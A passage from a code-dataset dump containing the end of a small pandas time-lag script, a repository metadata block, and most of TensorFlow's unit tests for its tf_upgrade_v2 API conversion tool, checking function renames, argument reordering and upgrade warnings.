pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
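# A toy illustration of the time-shift step used above (standalone, not part of
# the processing pipeline):
#
#     import datetime as dt
#     import pandas as pd
#
#     rng = pd.date_range('2000-01-01', periods=3, freq='D')
#     print([str(ts - dt.timedelta(hours=6)) for ts in rng])
#     # ['1999-12-31 18:00:00', '2000-01-01 18:00:00', '2000-01-02 18:00:00']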
|
[
"[email protected]"
] | |
4a9659895ff26415d2e5c664d5a506eec24aa53e
|
511c026261ecbccf90c9f561e1c0c66d45ac587e
|
/tensorflow/tools/compatibility/tf_upgrade_v2_test.py
|
23446e30b12d2ca8d9611f6b0b8adfb697bec02c
|
[
"Apache-2.0"
] |
permissive
|
wulongyuan/tensorflow
|
6d064af7ecc3404a7f2afe754002c6033e61740d
|
2a5abdb77806e06ce7e2820ede6233ca79cf5625
|
refs/heads/master
| 2020-04-17T06:42:24.947326 | 2019-01-18T03:02:03 | 2019-01-18T03:11:11 | 166,336,164 | 1 | 0 |
Apache-2.0
| 2019-01-18T03:14:49 | 2019-01-18T03:14:48 | null |
UTF-8
|
Python
| false | false | 41,192 |
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.0 upgrader."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import os
import tempfile
import six
import tensorflow as tf
# OSS TF V2 import placeholder.
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test as test_lib
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_export
from tensorflow.python.util import tf_inspect
from tensorflow.tools.common import public_api
from tensorflow.tools.common import traverse
from tensorflow.tools.compatibility import ast_edits
from tensorflow.tools.compatibility import tf_upgrade_v2
def get_symbol_for_name(root, name):
name_parts = name.split(".")
symbol = root
# Iterate starting with second item since 1st item is "tf.".
for part in name_parts[1:]:
symbol = getattr(symbol, part)
return symbol
def get_args(symbol):
if hasattr(inspect, "signature"):
signature = inspect.signature(symbol)
# Ignore *args and **kwargs for now.
return [param.name for param in signature.parameters.values()
if param.kind == param.POSITIONAL_OR_KEYWORD]
return tf_inspect.getargspec(symbol)[0]
def get_func_and_args_from_str(call_str):
"""Parse call string to get function and argument names.
Args:
call_str: Call string must be in the form:
`tf.foo(arg1=val1, arg2=val2, ...)`.
Returns:
(function_name, list of arg names) tuple.
"""
open_paren_index = call_str.find("(")
close_paren_index = call_str.rfind(")")
function_name = call_str[:call_str.find("(")]
args = call_str[open_paren_index+1:close_paren_index].split(",")
args = [arg.split("=")[0].strip() for arg in args]
args = [arg for arg in args if arg] # filter out empty strings
return function_name, args
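# Example (illustrative): get_func_and_args_from_str("tf.foo(a=1, b=2)")
# returns ("tf.foo", ["a", "b"]).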
class TestUpgrade(test_util.TensorFlowTestCase):
"""Test various APIs that have been changed in 2.0.
We also test whether a converted file is executable. test_file_v1_10.py
aims to exhaustively test that API changes are convertible and actually
work when run with current TensorFlow.
"""
@classmethod
def setUpClass(cls):
cls.v2_symbols = {}
if not hasattr(tf.compat, "v2"):
return
def symbol_collector(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
api_names_v2 = tf_export.get_v2_names(attr)
for name in api_names_v2:
cls.v2_symbols["tf." + name] = attr
visitor = public_api.PublicAPIVisitor(symbol_collector)
traverse.traverse(tf.compat.v2, visitor)
def _upgrade(self, old_file_text):
in_file = six.StringIO(old_file_text)
out_file = six.StringIO()
upgrader = ast_edits.ASTCodeUpgrader(tf_upgrade_v2.TFAPIChangeSpec())
count, report, errors = (
upgrader.process_opened_file("test.py", in_file,
"test_out.py", out_file))
return count, report, errors, out_file.getvalue()
def testParseError(self):
_, report, unused_errors, unused_new_text = self._upgrade(
"import tensorflow as tf\na + \n")
self.assertTrue(report.find("Failed to parse") != -1)
def testReport(self):
text = "tf.angle(a)\n"
_, report, unused_errors, unused_new_text = self._upgrade(text)
# This is not a complete test, but it is a sanity test that a report
# is generating information.
self.assertTrue(report.find("Renamed function `tf.angle` to "
"`tf.math.angle`"))
def testRename(self):
text = "tf.conj(a)\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "tf.math.conj(a)\n")
text = "tf.rsqrt(tf.log_sigmoid(3.8))\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "tf.math.rsqrt(tf.math.log_sigmoid(3.8))\n")
def testAllAPI(self):
if not hasattr(tf.compat, "v2"):
return
# Converts all symbols in the v1 namespace to the v2 namespace, raising
# an error if the target of the conversion is not in the v2 namespace.
# Please regenerate the renames file or edit any manual renames if this
# test fails.
def conversion_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
api_names = tf_export.get_v1_names(attr)
for name in api_names:
_, _, _, text = self._upgrade("tf." + name)
if (text and
not text.startswith("tf.compat.v1") and
text not in self.v2_symbols):
self.assertFalse(
True, "Symbol %s generated from %s not in v2 API" % (
text, name))
visitor = public_api.PublicAPIVisitor(conversion_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
def testAllAPIV1(self):
collect = True
v1_symbols = set([])
# Symbols which may be generated by the conversion script which do not exist
# in TF 1.x. This should be a very short list of symbols which are
# experimental in 1.x but stable for 2.x.
whitelisted_v2_only_symbols = set(["tf.saved_model.save"])
# Converts all symbols in the v1 namespace to the v2 namespace, raising
# an error if the target of the conversion is not in the v1 namespace.
def conversion_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
api_names = tf_export.get_v1_names(attr)
for name in api_names:
if collect:
v1_symbols.add("tf." + name)
else:
_, _, _, text = self._upgrade("tf." + name)
if (text and
not text.startswith("tf.compat.v1") and
not text.startswith("tf.estimator") and
text not in v1_symbols and
text not in whitelisted_v2_only_symbols):
self.assertFalse(
True, "Symbol %s generated from %s not in v1 API" % (
text, name))
visitor = public_api.PublicAPIVisitor(conversion_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
collect = False
traverse.traverse(tf.compat.v1, visitor)
def testV1KeywordArgNames(self):
all_keyword_renames = (
tf_upgrade_v2.TFAPIChangeSpec().function_keyword_renames)
# Visitor that verifies V1 argument names.
def arg_test_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
names_v1 = tf_export.get_v1_names(attr)
for name in names_v1:
name = "tf.%s" % name
if name not in all_keyword_renames:
continue
arg_names_v1 = tf_inspect.getargspec(attr)[0]
keyword_renames = all_keyword_renames[name]
self.assertEqual(type(keyword_renames), dict)
# Assert that v1 function has valid v1 argument names.
for from_name, _ in keyword_renames.items():
self.assertIn(
from_name, arg_names_v1,
"%s not found in %s arguments: %s" %
(from_name, name, str(arg_names_v1)))
visitor = public_api.PublicAPIVisitor(arg_test_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
def testV2KeywordArgNames(self):
# This test converts a call of the form:
# tf.foo(arg1=0, arg2=1, ...)
# to 2.0. Then, checks that converted function has valid argument names.
if not hasattr(tf.compat, "v2"):
return
v2_arg_exceptions = {
"verify_shape_is_now_always_true",
# These arguments should not be used, they just specify
# that a function takes named arguments.
"keyword_required",
"_sentinel",
}
v1_name_exceptions = {
"tf.print", # requires print_function import
}
function_warnings = (
tf_upgrade_v2.TFAPIChangeSpec().function_warnings)
function_transformers = (
tf_upgrade_v2.TFAPIChangeSpec().function_transformers)
keyword_renames = (
tf_upgrade_v2.TFAPIChangeSpec().function_keyword_renames)
# Visitor that converts to V2 and checks V2 argument names.
def conversion_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
if not tf_inspect.isfunction(attr):
continue
names_v1 = tf_export.get_v1_names(attr)
arg_names_v1 = get_args(attr)
for name in names_v1:
tf_name = "tf.%s" % name
if tf_name in function_warnings or tf_name in function_transformers:
continue # These require manual change
if tf_name in v1_name_exceptions:
continue
# Assert that arg names after converting to v2 are present in
# v2 function.
# 1. First, create an input of the form:
# tf.foo(arg1=val1, arg2=val2, ...)
args = ",".join(
["%s=%d" % (from_name, from_index)
for from_index, from_name in enumerate(arg_names_v1)])
text_input = "%s(%s)" % (tf_name, args)
# 2. Convert the input to V2.
_, _, _, text = self._upgrade(text_input)
new_function_name, new_args = get_func_and_args_from_str(text)
if new_function_name == "tf.compat.v1.%s" % name:
if tf_name in keyword_renames:
# If we rename arguments, new function must be available in 2.0.
# We should not be using compat.v1 in this case.
self.assertFalse(
"Function '%s' is not in 2.0 when converting\n%s\nto\n%s" %
(new_function_name, text_input, text))
continue
# 3. Verify V2 function and arguments.
args_v2 = get_args(self.v2_symbols[new_function_name])
args_v2.extend(v2_arg_exceptions)
for new_arg in new_args:
self.assertIn(
new_arg, args_v2,
"Invalid argument '%s' in 2.0 when converting\n%s\nto\n%s.\n"
"Supported arguments: %s" % (
new_arg, text_input, text, str(args_v2)))
visitor = public_api.PublicAPIVisitor(conversion_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
def testReorderFileNeedsUpdate(self):
reordered_function_names = (
tf_upgrade_v2.TFAPIChangeSpec().reordered_function_names)
function_reorders = (
tf_upgrade_v2.TFAPIChangeSpec().function_reorders)
added_names_message = """Some function names in
self.reordered_function_names are not in reorders_v2.py.
Please run the following commands to update reorders_v2.py:
bazel build tensorflow/tools/compatibility/update:generate_v2_reorders_map
bazel-bin/tensorflow/tools/compatibility/update/generate_v2_reorders_map
"""
removed_names_message = """%s in self.reorders_v2 does not match
any name in self.reordered_function_names.
Please run the following commands to update reorders_v2.py:
bazel build tensorflow/tools/compatibility/update:generate_v2_reorders_map
bazel-bin/tensorflow/tools/compatibility/update/generate_v2_reorders_map
"""
self.assertTrue(
reordered_function_names.issubset(function_reorders),
added_names_message)
# function_reorders should contain reordered_function_names
# and their TensorFlow V1 aliases.
for name in function_reorders:
# get other names for this function
attr = get_symbol_for_name(tf.compat.v1, name)
_, attr = tf_decorator.unwrap(attr)
v1_names = tf_export.get_v1_names(attr)
self.assertTrue(v1_names)
v1_names = ["tf.%s" % n for n in v1_names]
# check if any other name is in
self.assertTrue(
any(n in reordered_function_names for n in v1_names),
removed_names_message % name)
def testRenameConstant(self):
text = "tf.MONOLITHIC_BUILD\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "tf.sysconfig.MONOLITHIC_BUILD\n")
text = "some_call(tf.MONOLITHIC_BUILD)\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "some_call(tf.sysconfig.MONOLITHIC_BUILD)\n")
def testRenameArgs(self):
text = ("tf.nn.pool(input_a, window_shape_a, pooling_type_a, padding_a, "
"dilation_rate_a, strides_a, name_a, data_format_a)\n")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text,
("tf.nn.pool(input=input_a, window_shape=window_shape_a,"
" pooling_type=pooling_type_a, padding=padding_a, "
"dilations=dilation_rate_a, strides=strides_a, "
"name=name_a, data_format=data_format_a)\n"))
def testReorder(self):
text = "tf.boolean_mask(a, b, c, d)\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text,
"tf.boolean_mask(tensor=a, mask=b, name=c, axis=d)\n")
def testLearningRateDecay(self):
for decay in ["tf.train.exponential_decay",
"tf.train.polynomial_decay", "tf.train.natural_exp_decay",
"tf.train.inverse_time_decay", "tf.train.cosine_decay",
"tf.train.cosine_decay_restarts",
"tf.train.linear_cosine_decay",
"tf.train.noisy_linear_cosine_decay"]:
text = "%s(a, b)\n" % decay
_, report, errors, _ = self._upgrade(text)
self.assertIn("%s requires manual check" % decay, errors[0])
self.assertIn("%s has been changed" % decay, report)
def testPiecewiseDecay(self):
text = "tf.train.piecewise_constant_decay(a, b)\n"
_, report, errors, _ = self._upgrade(text)
self.assertIn("tf.train.piecewise_constant_decay requires manual check",
errors[0])
self.assertIn("tf.train.piecewise_constant_decay has been changed", report)
def testMetrics(self):
metrics = [
"accuracy",
"auc",
"average_precision_at_k",
"false_negatives",
"false_negatives_at_thresholds",
"false_positives",
"false_positives_at_thresholds",
"mean",
"mean_absolute_error",
"mean_cosine_distance",
"mean_iou",
"mean_per_class_accuracy",
"mean_relative_error",
"mean_squared_error",
"mean_tensor",
"percentage_below",
"precision",
"precision_at_k",
"precision_at_thresholds",
"precision_at_top_k",
"recall",
"recall_at_k",
"recall_at_thresholds",
"recall_at_top_k",
"root_mean_squared_error",
"sensitivity_at_specificity",
"sparse_average_precision_at_k",
"sparse_precision_at_k",
"specificity_at_sensitivity",
"true_negatives",
"true_negatives_at_thresholds",
"true_positives",
"true_positives_at_thresholds",
]
for m in metrics:
ns = "tf.metrics." + m
text = ns + "(a, b)"
_, report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.compat.v1.metrics." + m + "(a, b)", new_text)
self.assertIn("test.py:1:0: %s requires manual check" % ns, errors[0])
self.assertIn(
"WARNING: tf.metrics have been converted to object oriented"
" versions in TF 2.0 and after. The metric function calls have been "
"converted to compat.v1 for backward compatibility. Please update "
"these calls to the TF 2.0 versions.", report)
def testLosses(self):
losses = [
"absolute_difference",
"add_loss",
"compute_weighted_loss",
"cosine_distance",
"get_losses",
"get_regularization_loss",
"get_regularization_losses",
"get_total_loss",
"hinge_loss",
"huber_loss",
"log_loss",
"mean_pairwise_squared_error",
"mean_squared_error",
"sigmoid_cross_entropy",
"softmax_cross_entropy",
"sparse_softmax_cross_entropy",
]
for l in losses:
ns = "tf.losses." + l
text = ns + "(a, b)"
_, report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.compat.v1.losses." + l + "(a, b)", new_text)
self.assertIn("test.py:1:0: %s requires manual check" % ns, errors[0])
self.assertIn(
"WARNING: tf.losses have been converted to object oriented"
" versions in TF 2.0 and after. The loss function calls have been "
"converted to compat.v1 for backward compatibility. Please update "
"these calls to the TF 2.0 versions.", report)
def testEstimatorLossReductionChange(self):
classes = [
"LinearClassifier", "LinearRegressor", "DNNLinearCombinedClassifier",
"DNNLinearCombinedRegressor", "DNNRegressor", "DNNClassifier",
"BaselineClassifier", "BaselineRegressor"
]
for c in classes:
ns = "tf.estimator." + c
text = ns + "(a, b)"
_, report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertIn("%s requires manual check" % ns, errors[0])
self.assertIn("loss_reduction has been changed", report)
def testDropout(self):
text = "tf.nn.dropout(x, keep_prob, name=\"foo\")\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, 1 - (keep_prob), name=\"foo\")\n",
)
text = "tf.nn.dropout(x, keep_prob=.4, name=\"foo\")\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, rate=1 - (.4), name=\"foo\")\n",
)
text = (
"tf.nn.dropout(x, # Stuff before\n"
" keep_prob=.4, # Stuff after\n"
" name=\"foo\")\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, # Stuff before\n"
" rate=1 - (.4), # Stuff after\n"
" name=\"foo\")\n",
)
text = "tf.nn.dropout(x)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(new_text, text)
self.assertIn("tf.nn.dropout called without arguments", errors[0])
def testDropoutExpr(self):
text = "tf.nn.dropout(x, 1 - func(3 + 4.), name=\"foo\")\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, 1 - (1 - func(3 + 4.)), name=\"foo\")\n",
)
def testMathCountNonZeroChanges(self):
text = (
"tf.math.count_nonzero(input_tensor=input, dtype=dtype, name=name, "
"reduction_indices=axis, keep_dims=keepdims)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.math.count_nonzero(input=input, dtype=dtype, name=name, "
"axis=axis, keepdims=keepdims)\n"
)
self.assertEqual(new_text, expected_text)
def testCountNonZeroChanges(self):
text = (
"tf.count_nonzero(input_tensor=input, dtype=dtype, name=name, "
"reduction_indices=axis, keep_dims=keepdims)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.math.count_nonzero(input=input, dtype=dtype, name=name, "
"axis=axis, keepdims=keepdims)\n"
)
self.assertEqual(new_text, expected_text)
def testRandomMultinomialToRandomCategorical(self):
text = (
"tf.random.multinomial(logits, samples, seed, name, output_dtype)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.random.categorical(logits=logits, num_samples=samples, seed=seed, "
"name=name, dtype=output_dtype)\n"
)
self.assertEqual(new_text, expected_text)
text = (
"tf.multinomial(logits, samples, seed, name, output_dtype)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.random.categorical(logits=logits, num_samples=samples, seed=seed, "
"name=name, dtype=output_dtype)\n"
)
self.assertEqual(new_text, expected_text)
def testRandomPoissonConversion(self):
text1 = "tf.random_poisson(lam, shape, dtype)"
text2 = "tf.random.poisson(lam, shape, dtype)"
expected_text = "tf.random.poisson(lam=lam, shape=shape, dtype=dtype)"
_, unused_report, unused_errors, new_text1 = self._upgrade(text1)
self.assertEqual(new_text1, expected_text)
_, unused_report, unused_errors, new_text2 = self._upgrade(text2)
self.assertEqual(new_text2, expected_text)
def testConvolutionOpUpdate(self):
text = (
"tf.nn.convolution(input, filter, padding, strides, dilation_rate, "
"name, data_format)"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.nn.convolution(input=input, filters=filter, padding=padding, "
"strides=strides, dilations=dilation_rate, name=name, "
"data_format=data_format)"
)
self.assertEqual(new_text, expected_text)
def test_substr(self):
text = "tf.substr(input, pos, len, name, unit)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.strings.substr(input=input, pos=pos, len=len, "
"name=name, unit=unit)\n", new_text)
self.assertEqual(errors, [])
def testColocateGradientsWithOps(self):
text = "tf.gradients(a, foo=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertEqual(errors, [])
text = "tf.gradients(a, colocate_gradients_with_ops=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.gradients(a)\n", new_text)
self.assertIn("tf.gradients", errors[0])
self.assertIn("requires manual check", errors[0])
def testColocateGradientsWithOpsMinimize(self):
text = "optimizer.minimize(a, foo=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertEqual(errors, [])
text = "optimizer.minimize(a, colocate_gradients_with_ops=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("optimizer.minimize(a)\n", new_text)
self.assertIn("requires manual check", errors[0])
self.assertIn("minimize", errors[0])
def testColocateGradientsWithOpsComputeGradients(self):
text = "optimizer.compute_gradients(a, foo=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertEqual(errors, [])
text = "optimizer.compute_gradients(a, colocate_gradients_with_ops=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("optimizer.compute_gradients(a)\n", new_text)
self.assertIn("requires manual check", errors[0])
self.assertIn("compute_gradients", errors[0])
def testExportSavedModelRename(self):
text = "self.est.export_savedmodel(path)"
_, report, unused_errors, unused_new_text = self._upgrade(text)
self.assertIn(
"rename the method export_savedmodel() to export_saved_model()",
report)
def testArgmin(self):
text = "tf.argmin(input, name=n, dimension=1, output_type=type)"
expected_text = "tf.argmin(input=input, name=n, axis=1, output_type=type)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.argmin(input, 0)"
expected_text = "tf.argmin(input=input, axis=0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.arg_min(input, 0)"
expected_text = "tf.argmin(input, 0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testArgmax(self):
text = "tf.argmax(input, name=n, dimension=1, output_type=type)"
expected_text = "tf.argmax(input=input, name=n, axis=1, output_type=type)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.argmax(input, 0)"
expected_text = "tf.argmax(input=input, axis=0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.arg_max(input, 0)"
expected_text = "tf.argmax(input, 0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testEstimatorInputs(self):
text = "tf.estimator.inputs.numpy_input_fn(0)"
expected_text = "tf.compat.v1.estimator.inputs.numpy_input_fn(0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.estimator.inputs.pandas_input_fn(0)"
expected_text = "tf.compat.v1.estimator.inputs.pandas_input_fn(0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testBatchToSpace(self):
text = "tf.batch_to_space_nd(input, block_shape, crops, name)"
expected_text = "tf.batch_to_space(input, block_shape, crops, name)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.batch_to_space(input, crops, block_size, name)"
expected_text = (
"tf.batch_to_space(input=input, crops=crops, block_shape=block_size, "
"name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.manip.batch_to_space_nd(input, block_shape, crops, name)"
expected_text = "tf.batch_to_space(input, block_shape, crops, name)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testExtractImagePatches(self):
text = (
"tf.extract_image_patches(images, ksizes=ksizes, strides=strides,"
"rates=rates, padding=padding, name=name)")
expected_text = (
"tf.image.extract_image_patches(images, sizes=ksizes, strides=strides,"
"rates=rates, padding=padding, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testStatelessMultinomial(self):
text = (
"tf.random.stateless_multinomial(logits, num_samples, seed, "
"output_dtype=dtype, name=name)")
expected_text = (
"tf.random.stateless_categorical(logits, num_samples, seed, "
"dtype=dtype, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSoftMaxCrossEntropyWithLogitsV2(self):
text = (
"tf.nn.softmax_cross_entropy_with_logits_v2("
"labels=labels, logits=logits, dim=2)")
expected_text = (
"tf.nn.softmax_cross_entropy_with_logits("
"labels=labels, logits=logits, axis=2)")
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
self.assertFalse(errors)
def testSoftMaxCrossEntropyWithLogits(self):
text = ("tf.nn.softmax_cross_entropy_with_logits("
"labels=labels, logits=logits, dim=2)")
expected_text = (
"tf.nn.softmax_cross_entropy_with_logits("
"labels=tf.stop_gradient(labels), logits=logits, axis=2)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = ("tf.nn.softmax_cross_entropy_with_logits("
"labels=foo(bar))")
expected_text = ("tf.nn.softmax_cross_entropy_with_logits("
"labels=tf.stop_gradient(foo(bar)))")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testSparseMatmul(self):
text = ("tf.sparse_matmul(a, b, c, d, e, f, g)\n")
expected_text = ("tf.linalg.matmul(a=a, b=b, transpose_a=c, transpose_b=d, "
"a_is_sparse=e, b_is_sparse=f, name=g)\n")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testWeightedMoments(self):
text = "tf.nn.weighted_moments(x, axes, freq, name, kd)"
expected_text = (
"tf.nn.weighted_moments(x=x, axes=axes, frequency_weights=freq, "
"name=name, keepdims=kd)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSparseAdd(self):
text = "tf.sparse.add(a, b, t)"
expected_text = "tf.sparse.add(a=a, b=b, threshold=t)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSparseConcat(self):
text = "tf.sparse.concat(ax, inp, name, exp, concat)"
expected_text = (
"tf.sparse.concat(axis=ax, sp_inputs=inp, name=name, "
"expand_nonconcat_dims=exp, axis=concat)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSeparableConv2D(self):
text = "tf.nn.separable_conv2d(inp, d, pt, strides, pad, rate, name, fmt)"
expected_text = (
"tf.nn.separable_conv2d(input=inp, depthwise_filter=d, "
"pointwise_filter=pt, strides=strides, padding=pad, "
"dilations=rate, name=name, data_format=fmt)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSpacetoBatch(self):
text = "tf.space_to_batch_nd(input, shape, paddings, name)"
expected_text = "tf.space_to_batch(input, shape, paddings, name)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.nn.space_to_batch(input, paddings, block_size, name)"
expected_text = (
"tf.space_to_batch(input=input, paddings=paddings, "
"block_shape=block_size, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testInTopK(self):
text = "tf.math.in_top_k(a, b, c, n)"
expected_text = (
"tf.math.in_top_k(predictions=a, targets=b, k=c, name=n)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testDepthToSpace(self):
text = "tf.nn.depth_to_space(input, block_size, name, data_format)"
expected_text = (
"tf.nn.depth_to_space(input=input, block_size=block_size, "
"name=name, data_format=data_format)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testEmbeddingLookup(self):
text = ("tf.nn.embedding_lookup(params, ids, partition_strategy, name, "
"validate_indices, max_norm)")
expected_text = ("tf.nn.embedding_lookup(params=params, ids=ids, "
"partition_strategy=partition_strategy, name=name, "
"validate_indices=validate_indices, max_norm=max_norm)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testEmbeddingLookupSparse(self):
text = ("tf.nn.embedding_lookup_sparse(params, sp_ids, sp_weights, "
"partition_strategy, name, combiner, max_norm)")
expected_text = ("tf.nn.embedding_lookup_sparse(params=params, "
"sp_ids=sp_ids, sp_weights=sp_weights, "
"partition_strategy=partition_strategy, name=name, "
"combiner=combiner, max_norm=max_norm)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testNnInTopK(self):
text = "tf.nn.in_top_k(predictions, targets, k, name)"
expected_text = ("tf.nn.in_top_k(predictions=predictions, "
"targets=targets, k=k, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSpaceToDepth(self):
text = "tf.nn.space_to_depth(input, block_size, name, data_format)"
expected_text = ("tf.nn.space_to_depth(input=input, block_size=block_size, "
"name=name, data_format=data_format)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testPrint(self):
# tf.print() cannot be parsed unless we import print_function
text = """from __future__ import print_function
tf.print()
tf.print('abc')
"""
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, text) # Text should stay the same
def testSparseSplit(self):
text = (
"tf.sparse_split(sp_input=sp_input, num_split=num_split, axis=axis, "
"name=name)")
expected_text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, axis=axis, "
"name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = (
"tf.sparse_split(sp_input=sp_input, num_split=num_split, "
"name=name, split_dim=axis)")
expected_text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, "
"name=name, axis=axis)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, "
"name=name, split_dim=axis)")
expected_text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, "
"name=name, axis=axis)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testBatchGather(self):
text = "tf.batch_gather(foo, bar)"
expected_text1 = "tf.gather(params=foo, indices=bar, batch_dims=-1)"
expected_text2 = "tf.gather(batch_dims=-1, params=foo, indices=bar)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertIn(new_text, [expected_text1, expected_text2])
text = "tf.batch_gather(params=foo, indices=bar)"
expected_text1 = "tf.gather(params=foo, indices=bar, batch_dims=-1)"
expected_text2 = "tf.gather(batch_dims=-1, params=foo, indices=bar)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
